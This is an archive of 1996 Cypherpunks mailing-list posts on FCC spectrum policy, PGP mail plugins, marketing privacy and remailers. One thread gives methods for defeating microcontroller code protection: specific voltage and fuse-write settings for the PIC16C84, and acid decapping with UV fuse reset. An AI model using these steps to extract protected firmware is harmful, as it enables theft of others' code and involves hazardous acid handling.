> already been done to death.  But this NIIBand could be a huge advantage for 
> small ISP's in rural areas (not JUST academia and K-12 Dave) if done right, 
> and another fiasco if done wrong.  The FCC has this open for comment now. 
>  If Mr. Hughes would provide info on docket numbers and where to write, you 
> all could have a significant impact.  On the one hand, you can offer 24 
> Mbps links by radio at 10-15 km.  On the other, 3COM can do wireless LAN 
> inside a building for about 1000 feet.  All from a stroke of the FCC pen.
> 
> 
Yes, this is a far more significant issue than most ISPs realize - whether
the FCC, in both responding to the Apple-WINForum proposal to allocate
350Mhz of spectrum in the 5Ghz bands for what the FCC dubbed the 
"NII/SUPERNET" Band for 'no licence' wireless - will do that in BOTH
the 'wireless lan' segment AS WELL AS the requested '15 km' segments
and thus permit anyone, including ISPs to have no-comm cost bandwidth
up to 2Mbps between two points, or, with relay, 1Mbps (above and
below T-1) for the cost of the radios. Spread spectrum technology which
is a revolution in radio communications (wide band, digital processor
controlled low power - with no practical interference versus traditional
narrow frequency band high power - with so much interferecne, the 
frquencies have to be licenced and highly controlled).

And yes I, and a too-small handful of others are deep into the issues
at the FCC level as the decision hangs in the balance. Because I
am the Principal Investigator on the $375,700 'Wireless Field Test
for Education Project' I was invited to a roundtable with FCC
Commissioners nominally debating 'wireless for education' two weeks
ago, and, using our real-world wireless project going on in the
San Luis Valley (one school being relaibaly connected now 15 miles
at 115kbs, bypassing US West, from NT-Lan router to Cisco Router
at the POP. Zero local loop cost) and reporting on the other
projects we have examined (8 Belen, New Mexico Schools, conected
T-1 between each other in a WAN - up to 10 miles across the district.
Zero local loop cost (which would normally run $84,000 a year wiht
telco T-1 between schools).

We made an impression, but know what giant forces we are up against.
Some FCC staffers want to 'auction' the longer range (even 15km)
stuff. Some big communications companies, led by the Cellular 
Telecommunications Industry Assn - CTIA, would like all 'no-licence'
that can compete with them to be killed. 

Our arguements, that got a few thinking anyway, was that IF the FCC
rules permit radios to be made which go 15-45 miles, no licence,
no interference, and solve the problem of the 16,000 school
districts whose biggest problem is the cost of bandwidth *between*
school building of a district first, then the cost from the main
hub to the POP, second, then between the student and/or teacher
at home to the school, at 56kbs or above, THEN the problem of
'community' networking will also be solved. For school districts
are coincident where people live and log on from. (ditto ISPs)

We turned a few heads when I showed my calcuations that, if
the 14 School Districts of the SanLuis Valley are connected to
the one central POP at T-1 by US West, it will cost $1.2 million
over 10 years. If by T-1 25mile radios (yeas they exist now)
it will cost $173,000 for the same 10 years. 

Now if ISPs want to strike a blow for economic telecom freedom, 
you can start by accessing our NSF Wireless Field Test web site,
 http://wireless.oldcolo.com  and go into the Regulatory section
where you will find direct documents, links to the FCC, the
Belen Paper, and my long but piercing piece 'The Case for 
Public Spectrum' (and if you are a skeptic about the technology,
read the Paul Baran short papers - the invetor of packet switching)

Then all you have to do to sumbit public comments o the NIIBand
matter is to email:

            96-102@fcc.gov

and that is the email address for the Docket Item. You *must* comment
before July 15th, or yours will not be considered. (but under the law
and regulation, if you *do* comment, your comments must be summarized
by the staff and presented to the COmmissioners with the staff 
views. 

You do NOT have to comment on all the heavy duty technical issues.
Right from the chief FCC Engineer who drafts the rules, and was
the father of the original Spread Spectrum rules in 1985 he
says that your statemnt of what you NEED, and why, would be
much appreciated. As simple as 'I am an ISP who needs T-1 from
my site, 8 miles to the nearest POP, no licence/cost wirless,
with a radio I can afford' is to the point. (of course the more
you show your technical economic need in sophisticated terms
the better it will be received. The FCC engineers are no dummies
and political handwaving doesn't impress them (it only impresses
the COmmissioners whenthe handwavers are called AT&T or Congress)

I can just about assure you the FCC staff doesn't even know you
exist, as a class, (small ISPs) or what function you serve in the
food chain, or why you shouldn't just pay $650 a month for your
local loop T-1 like anybody else. And unless you email them
(and they now have a policy that email must be taken as seriously
as formal paper mail filings), your colective case won't even
be mentioned when the likes of Motorola, AT&T, CTIA, the NSA
(who gets gas pains when secure wireless is mentioned) are
testifying.

All will not be totally lost if this NPRM does not fly (new
spectrum) for we still have the more congested Part 15, 1 watt
bands. And the 4 NSF types who attended the FCC rountable
were impressed enough with our case that we spent a day with them
and they are about to fund a 'developmental' project that will
be done by TAPR, that may bring you that $500 T-1 plug and play
radio, with range. (by licencing the guts to mfgrs).

Matter of fact I will be in Washington DC at the NSF Monday
on this (being carrie dby my sidekick in radio engineering
matters) and two other matters. One of which will (their idea,
not ours) see part of our team in Ulaanbaatar, Mongolia in
August, linking 8 sites to the satellite Spintlink downlink
site run by Mongolian engineers in an old Soviet lab. (web
page at www.magic.mn already - but they can't get the signal
across town, so crappy is their phone system). So by September
you willbe pinging systems in Mongolia, the last 10km of
which will be wireless.

I always wanted to help set up the Ghengis Khan BBS in a Mongolian
yurt, running OS2 (cause IBM is everywhere), with NAPLPS character
sets (Chinese, Cyrilli Russian, and Mongolian - none of which
are ascii), solar powered, and with spread spectrum radios
linking China to Russia. With nary a Telco in a hundred miles.
And I got a hunch I will have that done before ISPs in NYC
do it.

Dave Hughes
dave@oldcolo.com

Oh yeah, if you http://192.160.122.3  you will reach, by wireless,
the OS2 system in my home. Not blazingly fast beacause I
am trying out a different set of radios. And teh wired 56kbs
frame relay to which it is attached is actuallythe slowest link
in the chain. But its been running 160kbs for almost a year now,
for $0 cost from me to my own Internet service.  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 16 Jun 1996 11:01:13 +0800
To: cypherpunks@toad.com
Subject: Sorry about that last forward
Message-ID: <199606152301.TAA08100@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about that. My mailer sometimes splits the forwards, so the 
c'punks header is filed correctly but the message goes into my 
general folder.

Rob.
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 16 Jun 1996 12:00:27 +0800
To: Krister Walfridsson <cato@df.lth.se>
Subject: Re: Cryptology and knot theory?
In-Reply-To: <Pine.VUL.3.91.960616003502.25074B-100000@marvin.df.lth.se>
Message-ID: <199606152350.TAA14182@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Krister Walfridsson writes:
>     17.10.3. Ciphers are somewhat like knots...the right sequence of moves
>              unties them, the wrong sequence only makes them more tangled. 
>              ("Knot theory" is becoming a hot topic in math and physics
>              (work of Vaughn Jones, string theory, etc.) and I suspect
>              there are some links between knot theory and crypto.)
>  
> Has any work been done along those lines?
> 
> I did some searches with AltaVista, but I only found Cyphernomicon...

I would have my doubts about how interesting the direction could get,
since knot theory is a dead area. The classification problem was fully
solved, and after that things got boring...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Adams <adamsc@io-online.com>
Date: Sun, 16 Jun 1996 15:33:43 +0800
To: <cypherpunks@toad.com>
Subject: More secure web browser
Message-ID: <199606160255.TAA20231@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This is all I got from the anonymizer test site (URL was posted  
recently).
 
<BR> Your Internet browser is IBM-WebExplorer-DLL/v1.1b.
 
<BR> You are coming from .

Seems reasonably private. Unfortunately, it's not an option if you  
don't use OS/2...








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 16 Jun 1996 15:30:44 +0800
To: Anonymous <nobody@flame.alias.net>
Subject: Re: alpha.c2.org in deep shit?
In-Reply-To: <199606152148.XAA21412@basement.replay.com>
Message-ID: <Pine.GUL.3.93.960615202748.4873B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 15 Jun 1996, Anonymous wrote:

> Am I the only one who receives apparently empty messages
> for my alpha.c2.org account?

No. Since late Thursday.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 16 Jun 1996 12:44:08 +0800
To: cypherpunks@toad.com
Subject: Re:  Proposal: PGPmail Plugin for Netscape/Mosaic
In-Reply-To: <199606152019.NAA02248@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960615203041.847A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 15 Jun 1996, Hal wrote:

> There was a little discussion about this on the coderpunks list, but I
> didn't get the impression that anyone was ready to run out and do it.
> I'm not sure whether plugins could also be used for receiving mail in
> addition to sending, but if so it does seem like a good way to add the
> functionality.

Netscape does have support for MIME.  So if PGP/MIME ever becomes more widely
used, the Netscape mail program would decrypt and verify emails automatically.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMcNWVLZc+sv5siulAQECuAP9EuKY4slviJ5W8FajzcO6B8LnT8BJo98W
8LOtXkKi+j8MZyX3jaX2Elpd3xrFzx1fSg4s7ZNQ/0RmfkPXK0TKeex+2Fh7zwME
mMYbLo3MEJuDh38g8FD4LZpnEC+I++X3tns5rlF9zp0LGSwnWiqjfT1w2uJCzGX2
GHncIh40eic=
=pEkp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 16 Jun 1996 13:16:16 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Comments on MicroPayments and the Web
In-Reply-To: <199606132222.PAA09190@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.93.960615203526.847B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 13 Jun 1996, Hal wrote:

> Where does the money come from to run this proxy?
> 
> Consider two sites, one which acts as a proxy and cache but which
> charges something under a penny per page, and another which acts for
> free.  Won't the for-pay site be able to afford a larger disk, more
> servers, and better net connections?  It will be a superior service.
> 
> Micropayments will allow new services and improved quality over what we
> have today where we have to rely on charity and advertising as
> motivations for much of what we find on the web.

Who says that such a proxy needs to be run on a different machine?  For UNIX
users with a SLIP/PPP connection, it is trivial to run a web proxy that could
be pointed to by web browser.  I believe that this is also possible for Mac
and Windoze users.  The point of the proxy is not to keep the user's username
or hostname anonymous, so it does not necessarily need to run on a seperate
host.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMcNXibZc+sv5siulAQFghAP/Ru/+82shqQ4GTNpXiMzjdyRQG3JAYJXz
WEf0tYjdTjIGrBYVbj+ECGsxBe+QXGCQSUrsDx6kVjjUVJ72P9TOccbFJ58EzXOc
YlVIx17kgAN959fnamU8NLd8cvPDwCvevGKnsQzh5nLuwgKx+6Gu22BmFKazfpJZ
Ihei1V9upuQ=
=yXZl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William R. Ward" <hermit@bayview.com>
Date: Sun, 16 Jun 1996 16:35:39 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: marketing "privacy": a nonproblem?
In-Reply-To: <199606142032.NAA28132@netcom4.netcom.com>
Message-ID: <199606160408.VAA16646@komodo.bayview.com>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Nuri writes at length about an anonymous system for getting
on marketer's lists, so that they can target people who want to buy
widgets without having to compile a "dossier" on everyone to determine
who might want a widget.

The problem with this is that finding a list of widget-buyers is not
the only reason marketers collect these "dossiers"... They also do it
to sell/rent the information to other marketers, who may be selling
Thingamajigs or widget related services or something else entirely --
and the information which is extraneous to the widget marketer is
quite useful to the thingamajig vendor or other companies, and selling
that information is profitable for the marketing firm.  This is
probably one reason companies outsource marketing a lot, to take
advantage of the databases they have compiled on the consumers.

Mr. Nuri's scheme is wonderful for cypherpunks; we only get the junk
mail that isn't junk to us (since we're actually interested in widgets
or whatever they're selling), and they don't get to compile a
"dossier" on us.  However it isn't as wonderful for the marketers as
he suggests, or they would already be using such a scheme.

One of the most important tasks for marketers is how to find new
customers, who have never heard of widgets.  For this they need
information on customers to find who might like a widget; if you have
heard of a widget and signed up on Mr. Nuri's list, then that's fine,
but for the rest of us who don't even know what one *is* much less
whether we want one, the marketers need to do their traditional
dossier system.

The Net doesn't really change anything here.  We've had anonymity
through email and telephones for a long time.  But *we* have to call
*them* in order to get on the anonymous widget consumer's list using
Mr. Nuri's system; traditional marketing techniques proactively search
out consumers to get them on the list.

All that aside, I certainly would prefer it if the world worked in a
way to make Mr. Nuri's system practical -- I dislike having "dossiers"
on me kept by every marketer in the world, and do not like unsolicited
advertising, but I just don't believe that we live in that sort of
world.

--Bill Ward





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 16 Jun 1996 17:25:29 +0800
To: "William R. Ward" <hermit@bayview.com>
Subject: Re: marketing "privacy": a nonproblem?
In-Reply-To: <199606160408.VAA16646@komodo.bayview.com>
Message-ID: <199606160455.VAA20513@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


by coincidence I'm logged in at the moment so will reply to
WRW immeidately;


>The problem with this is that finding a list of widget-buyers is not
>the only reason marketers collect these "dossiers"... They also do it
>to sell/rent the information to other marketers, who may be selling
>Thingamajigs or widget related services or something else entirely --
>and the information which is extraneous to the widget marketer is
>quite useful to the thingamajig vendor or other companies, and selling
>that information is profitable for the marketing firm. 

right. a marketing database. I agree. but realize that you can
still do the above without tying the information to *real*people*. the
system is ultimately only for *contacting*people*. you can do this
pseudonymously. the information about people can be dissociated
from their real identity. in all systems prior to cyberspace, one
tied information to real identities and a 3d physical location
called an "address"-- but in cyberspace you have a new kind of
address.

hence, is it possible to fulfill the demands of marketing while
preserving privacy? the point of my essay was to suggest that
perhaps marketing databases are not intrinsically privacy-hostile.

I have no problem with some company creating the marketing database.
just as long as there is some way of dissociating the knowledge
from real identities. in a good system, one does not rely on the
company to do so: they are forced to do so. if one could create
an entire system of money transactions that let them have their
info but at the same time never tied the info to real people, you'd
have privacy.  a crude method that exists today is to only use
pseudonyms when buying merchandise. another method would be to
have companies that do nothing but keep identities secret and
tie numbers with real things-- intermediate agents for purchasing
materials for us that protect our identity in all transactions.

> However it isn't as wonderful for the marketers as
>he suggests, or they would already be using such a scheme.

I believe a system that still lets the marketers have their databases
while preserving privacy .. that was the key idea behind the post.

>One of the most important tasks for marketers is how to find new
>customers, who have never heard of widgets.  For this they need
>information on customers to find who might like a widget; if you have
>heard of a widget and signed up on Mr. Nuri's list, then that's fine,
>but for the rest of us who don't even know what one *is* much less
>whether we want one, the marketers need to do their traditional
>dossier system.

still, they don't need a *real*identity* to do this. privacy==real identity
in my mind. they can still contact "entities" based on their numbers
or pseudonyms without knowing who they are talking to.

>The Net doesn't really change anything here.  We've had anonymity
>through email and telephones for a long time.  But *we* have to call
>*them* in order to get on the anonymous widget consumer's list using
>Mr. Nuri's system; traditional marketing techniques proactively search
>out consumers to get them on the list.

the net changes everything in a big way based on the easy access
to forms of identity camouflage such as anonymity and pseudonymity.

>All that aside, I certainly would prefer it if the world worked in a
>way to make Mr. Nuri's system practical -- I dislike having "dossiers"
>on me kept by every marketer in the world, and do not like unsolicited
>advertising, but I just don't believe that we live in that sort of
>world.

you don't seem to "get" some of the key ideas in the essay, in
particular the essential necessity of *real*identity* for there
to be a compromise of privacy. my point
is that it might be possible for marketers to create "dossier like system"
that actually preserve privacy-- because the dossier alone is not
enough info to tie the information with a real person. suppose
that someone had intimate knowledge about every detail about
person #1343 that is *me*. but they have no way of tying their
information to my real address, my real identity, *unless* I decide
they can do so. (notice I can transact with companies without them
knowing who I am or where I live. that's exactly what I'm talking
about).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Sun, 16 Jun 1996 17:08:41 +0800
To: cypherpunks@toad.com
Subject: Netscape Mail Security and PGP Plugins
Message-ID: <31C39529.133B6630@best.com>
MIME-Version: 1.0
Content-Type: text/plain


There hasn't been a lot of discussion on this list about the future
of secure e-mail via Netscape. The most i've seen has come from
Raph Levien on the standards battle between S/Mime and other various
implementations including one using PGP. Raph has said at various
Cypherpunks meetings now that( and not wanting to totally put words in
his mouth) the PGP based implementations have lost ground to S/MIME.
 The reason I believe that this whole area has received so little
quarter on the list is that either few people use Netscape for e-mail
and that few people actually send encrypted e-mail.
 I'm going to try and put together a compendium of web links on this 
so it's a little easier to track the developments and various schemes.
 At the second to last Cypherpunks Bay Area meeting we had a discussion
of crypto GUI's. It's my opinion that Netscape would be an excellent
place to start because it does encryption relatively seemlessly.
Incorporating S/MIME into the mail would be a great step forward in
bringing easy crypto to the general community. Any PGP plugin I would
hope eleviate the many UI problems PGP has.
 A couple of questions I have right off the bat are;
 1. In Hal's Java mail encryptor, what are the legal aspects of
sending code across that contains crypto?
 2. Can any plugin access the Netscape Mail program.
 3. When is S/MIME going to be in Netscape, I tried to find info on the
web site but thier statements about S/MIME seem vague.
 I hope I'm not running over old ground, but this has to be alot more
intresting than discussing that PBS show!

Greg Kucharo
sophi@best.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 16 Jun 1996 14:52:33 +0800
To: cypherpunks@toad.com
Subject: Re: alpha.c2.org in deep shit?
In-Reply-To: <199606152148.XAA21412@basement.replay.com>
Message-ID: <NRFLPD61w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@flame.alias.net (Anonymous) writes:

> Am I the only one who receives apparently empty messages
> for my alpha.c2.org account?

Your postmaster probably got it too.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kooltek@iol.ie (Hack Watch News)
Date: Sun, 16 Jun 1996 09:50:49 +0800
To: cypherpunks@toad.com
Subject: Re: Fuseable Links - no guarantees??
Message-ID: <199606152107.WAA28424@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


>At 11:44 PM 6/14/96 -0400, Warren wrote:
>>I have never paid much attention to the protection of firmware or the
>>technical issues revolving around such schemes...was wondering:
>>
>>I recently saw an add for a UK based group that says they can take a PIC
>>OTP micro and read the prom (for a fee, of course) - How the heck is this
>>done?? I have my suspicion that they (somehow) magically peel off the
>>ceramic coating (without destroying the chewy center), get a circuit mask
>>and 'micro probe' the I/O of the IC...they then download the secret recipe
>>to the afore mentioned 'chewy center'.

The advert was probably for a device/program called PICBUSTER. This is
basically a technique of popping the PIC16C84 microcontroller. The chip is
an EEPROM micro. There are a few ways of popping the chip but the simplest
is to ensure that there is set the supply voltage to the programming voltage
less about 0.7 Volts. This is generally done with the aid of a diode such as
the 1N4148. Then the fuses are reset. For normal programming there should be
at least 5 Volts differential. The smaller differential seems to only allow
the protection to be popped. It is not a fusible link as such.

If you want to read the details they are on
http://www.iol.ie/~kooltek/picbust.html

>>
>>Is this close to accurate?? How is it 'done' ???
>
>
>While I have never come even close to needing to attempt this kind of thing, 
>long ago it occurred to me that if the "no read" bit was stored in a 
>programmable bit, and if the location of that bit was known or could be 
>identified, you could expose that particular bit through a tiny mask hole 
>and cause the part to be readable again.  Locating that bit (assuming 
>there's just one) would be relatively simple:  Take a test part, program it, 
>read-lock it, and then expose it to a VERY slowly sliding mask with UV 
>behind.  Do this for both axes, to find the bit's location on the chip.

Apparently the protection fuse in the EPROM versions of the microcontrollers
are fairly readily identifiable. Most of the OTP microcontrollers are
essentially EPROM types without the quartz glass window. 

The commonest procedure for popping these is to first remove the coating and
then to measure accurately where the protection fuse is. Then, with another
that is to be popped, a small hole is drilled over the fuse area. The
drilling operation stops before reaching the silicon die. Then some strong
acid, either Sulphuric or Nitric is dropped in to disolve the coating. Then
a UV lamp is shone on the fuse to reset it.

The latter techique for popping chips is by far the most dangerous. It
requires proper acid handling procedures and good ventilation. 

Another technique is to fool the microncontroller into switching from
internal to external EPROM and then back. This hack generally works on the
8051, 8751, 8052 and 8752 microcontrollers.

I was coincidentally just finishing a section on popping chips for a book
that I am working on :-)

Regards...jmcc
(John McCormac)
********************************************
John McCormac            * Hack Watch News
jmcc@hackwatch.com       * 22 Viewmount, 
Voice&Fax: +353-51-73640 * Waterford,
BBS: +353-51-50143       * Ireland
********************************************

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
YXRjaC5jb20=
=sTfy
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sun, 16 Jun 1996 17:25:49 +0800
To: Chris Adams <adamsc@io-online.com>
Subject: Re: More secure web browser
In-Reply-To: <199606160255.TAA20231@toad.com>
Message-ID: <m23f3w5nuj.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Chris" == Chris Adams <adamsc@io-online.com> writes:

Chris> This is all I got from the anonymizer test site (URL was posted  
Chris> recently).
 
Chris> <BR> Your Internet browser is IBM-WebExplorer-DLL/v1.1b.
 
Chris> <BR> You are coming from .

Chris> Seems reasonably private. Unfortunately, it's not an option if you  
Chris> don't use OS/2...

I doubt it.  You're only `private' wrt hostname because io-online's
reverse DNS tables appear (very) broken.  This has nothing to do with
the browser or the O/S.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 16 Jun 1996 17:28:35 +0800
To: cypherpunks@toad.com
Subject: Re: [Slightly less Off-topic] Re: Insults (was: PBS show)
Message-ID: <199606160530.WAA07457@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:18 PM 6/15/96 -0000, nelson@crynwr.com wrote:
> But the "crypto-" prefix has an additional
> meaning that may make its use somewhat problematic.  A "crypto-"
> something can be a "fake-" or "hidden-" something.  So if it actually
> became popular to be a geek, you'd have cool people becoming
> crypto-geeks.

Incorrect:  Crypto-something means a hidden something, not fake something:  
Most popular usage is "cryptofascist" since fascism is so terribly 
politically incorrect these days, and many fascists are politically 
correct, so they do not call themselves fascist.

Another common usage is crypto-totalitarian.

A crypto-anarchist could mean either someone who seeks to destroy the state 
by higher mathematics, or someone who conceals his real aim of destroying
the state. 

Because cryptography is in many ways subtle attack on the state, with
consequences
far more radical than is at first apparent, those who seek to destroy the state 
by this means often are not obvious anarchists -- crypto-anarchists are often 
crypto-anarchists.

The intended meaning is usually obvious from context:  I have never seen the
word
crypto-anarchist used in the sense of a secret anarchist.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Sun, 16 Jun 1996 17:25:29 +0800
To: cypherpunks@toad.com
Subject: Netscape Mail Security and PGP Plugins
Message-ID: <31C39B3C.5E09CCD6@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually there is a web page covering quite a bit

www.c2.org/~raph/pgpmime.html

This is Raph's page and is still under construction. The whole gist of
my last mail was to level more discussion at using Netscape and browsers
in general as a low common denominator way of getting more crypto out
there.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sun, 16 Jun 1996 17:01:55 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] (was Re: PBS show)
Message-ID: <960615224725_135852446@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-15 16:15:17 EDT, perry@piermont.com (Perry E.
Metzger) writes:

>
>

new lows??? Its a rather reasonable question about the protected mode on the
intel chips considering the limits of 640K mem...Sorry if Im not as 'versed'
in proteected mode as you,master, seem to be. Oh please teach us lesser ones.
Gee. But..... Is it OK to go over encryption ran in straight ASM to you??
Would that maybe please you a little more oh mentor.
Gee.. Later god.
or is that............. nevermind.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Sun, 16 Jun 1996 09:57:07 +0800
To: cypherpunks@toad.com
Subject: Proposal: PGPmail Plugin for Netscape/Mosaic
Message-ID: <1996-Jun15-230011.1>
MIME-Version: 1.0
Content-Type: text/plain


The suggestion of building in PGP keys into web pages is something
that I have operated on http://mkn.co.uk/ for around 10 months.

The program that incorporates this is
ftp://ftp.mkn.co.uk/mktnet/pub/horse.zip which is a PGP implementation
that is independent of PGP per se.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 16 Jun 1996 15:52:39 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re:  pretty good reputation
Message-ID: <199606160331.XAA12152@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Jun 96 at 13:09, Hal wrote:
[..]
> There was considerable discussion in the design of PGP's key signatures
> on this issue, and Phil decided against trying to let people express
> publicly how much they trust others.  Among other things, he was afraid
> that people would feel compelled to lie for social reasons, leading to
> inaccurate trust estimates and weak key validations.

Good point.

Any system with multi-valued or yes/no signatures becomes 
unresolvable in a web, making these values useless beyond an order or 
one or two levels.

We've argued about this before on the list...

Another interesting point, though: feature creep.  Something like 
that may be another intimidating factor that turns people off from 
PGP.

Rob

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Sun, 16 Jun 1996 10:47:43 +0800
To: c2.org.postmaster@alpha.c2.org
Subject: alpha.c2.org in deep shit?
Message-ID: <199606152148.XAA21412@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Am I the only one who receives apparently empty messages
for my alpha.c2.org account?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sun, 16 Jun 1996 10:10:11 +0800
To: Warren <wxfield@shore.net>
Subject: Re: Fuseable Links - no guarantees??
In-Reply-To: <v02140701ade8a5dbd914@[204.167.110.204]>
Message-ID: <31C3343D.2F1CF0FB@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Warren wrote:
> 
> Jim;
> 
>         I was under the impression that a fuseable link was literally a
> piece of conductive material that you deliberatley 'blow-away' - In most
> cases, couldn't you simply 'tap into' the data side of the fuse, and
> download the info??
> 
> >At 11:44 PM 6/14/96 -0400, Warren wrote:
> >>I have never paid much attention to the protection of firmware or the
> >>technical issues revolving around such schemes...was wondering:
> >>
> >>I recently saw an add for a UK based group that says they can take a PIC
> >>OTP micro and read the prom (for a fee, of course) - How the heck is this
> >>done?? I have my suspicion that they (somehow) magically peel off the
> >>ceramic coating (without destroying the chewy center), get a circuit mask
> >>and 'micro probe' the I/O of the IC...they then download the secret recipe
> >>to the afore mentioned 'chewy center'.


Rumour has it that it is done like this:

"To read a protected 16C84 make sure your VPP is 13.5 volts, then VCC should  
be about .5 volt less, I dont know about the accuracy of this one person  
told me he used a diode thet is .6 volts. now write the value 0x001f to the  
fuse 0x2007 about 3-10 times switch back to standard and read the chip. " 

It may or may not work - I would be interested if anyone can confirm it.


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 16 Jun 1996 16:30:39 +0800
To: cypherpunks@toad.com
Subject: More info on this?
Message-ID: <199606160412.AAA12830@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Found this on the NY (Cyber)Times site (http://www.nytimes.com)
under This Weeks Stories...


